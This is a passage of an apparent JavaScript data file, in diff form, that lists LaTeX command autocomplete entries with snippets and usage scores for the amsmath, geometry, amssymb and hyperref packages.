caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amsmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'amsmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'amsmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'amsmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'amsmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'amsmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'amsmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'amsmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'amsmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'amsmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'amsmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'amsmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'amsmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'amsmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'amsmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'amsmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'amsmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'amsmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'amsmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'amsmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'amsmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'amsmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'amsmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'amsmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'amsmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'amsmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'amsmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'amsmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'amsmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'amsmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'amsmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'amsmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'amsmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'amsmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'amsmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'amsmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'amsmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'amsmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'amsmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'amsmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'amsmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'amsmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'amsmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'amsmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'amsmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'amsmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'amsmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'amsmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'amsmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'amsmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'amsmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'amsmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'amsmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'amsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'amsmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'amsmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'amsmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'amsmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'amsmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'amsmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'amsmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'amsmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'amsmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'amsmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'amsmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'amsmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'amsmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'amsmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'amsmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'amsmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'amsmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'amsmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'amsmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'amsmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'amsmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'amsmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'amsmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'amsmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'amsmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'amsmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'amsmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'amsmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'amsmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'amsmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'amsmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'amsmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'amsmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'amsmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'amsmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'amsmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'amsmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'amsmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'amsmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'amsmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'amsmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'amsmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'amsmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'amsmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'amsmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'amsmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'amsmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'amsmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'amsmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'amsmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'amsmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'amsmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'amsmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'amsmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'amsmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'amsmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'amsmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'amsmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'amsmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'amsmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'amsmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'amsmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'amsmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'amsmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'amsmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'amsmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'amsmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'amsmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'amsmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'amsmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'amsmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'amsmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'amsmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'amsmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'amsmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'amsmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'amsmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'amsmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'amsmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'amsmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'amsmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'amsmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'amsmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'amsmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'amsmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'amsmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amsmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsmath-cmd', + score: 0.0063276692758974925, + }, + ], + geometry: [ + { + caption: '\\savegeometry{}', + snippet: '\\savegeometry{$1}', + meta: 'geometry-cmd', + score: 6.461638865465447e-5, + }, + { + caption: '\\loadgeometry{}', + snippet: '\\loadgeometry{$1}', + meta: 'geometry-cmd', + score: 6.461638865465447e-5, + }, + { + caption: '\\newgeometry{}', + snippet: '\\newgeometry{$1}', + meta: 'geometry-cmd', + score: 0.0025977479207639352, + }, + { + caption: '\\geometry{}', + snippet: '\\geometry{$1}', + meta: 'geometry-cmd', + score: 0.046218420429973615, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'geometry-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\restoregeometry', + snippet: '\\restoregeometry', + meta: 'geometry-cmd', + score: 0.0007546303842143648, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'geometry-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'geometry-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'geometry-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'geometry-cmd', + score: 0.00021116765384691477, + }, + ], + amssymb: [ + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'amssymb-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'amssymb-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'amssymb-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'amssymb-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'amssymb-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'amssymb-cmd', + score: 0.0006671850995492977, + }, + ], + hyperref: [ + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'hyperref-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'hyperref-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'hyperref-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'hyperref-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'hyperref-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'hyperref-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'hyperref-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'hyperref-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'hyperref-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'hyperref-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'hyperref-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'hyperref-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'hyperref-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'hyperref-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'hyperref-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'hyperref-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'hyperref-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'hyperref-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'hyperref-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'hyperref-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'hyperref-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'hyperref-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'hyperref-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'hyperref-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'hyperref-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'hyperref-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'hyperref-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'hyperref-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'hyperref-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'hyperref-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'hyperref-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'hyperref-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'hyperref-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'hyperref-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'hyperref-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'hyperref-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'hyperref-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'hyperref-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'hyperref-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'hyperref-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'hyperref-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'hyperref-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'hyperref-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'hyperref-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'hyperref-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'hyperref-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'hyperref-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 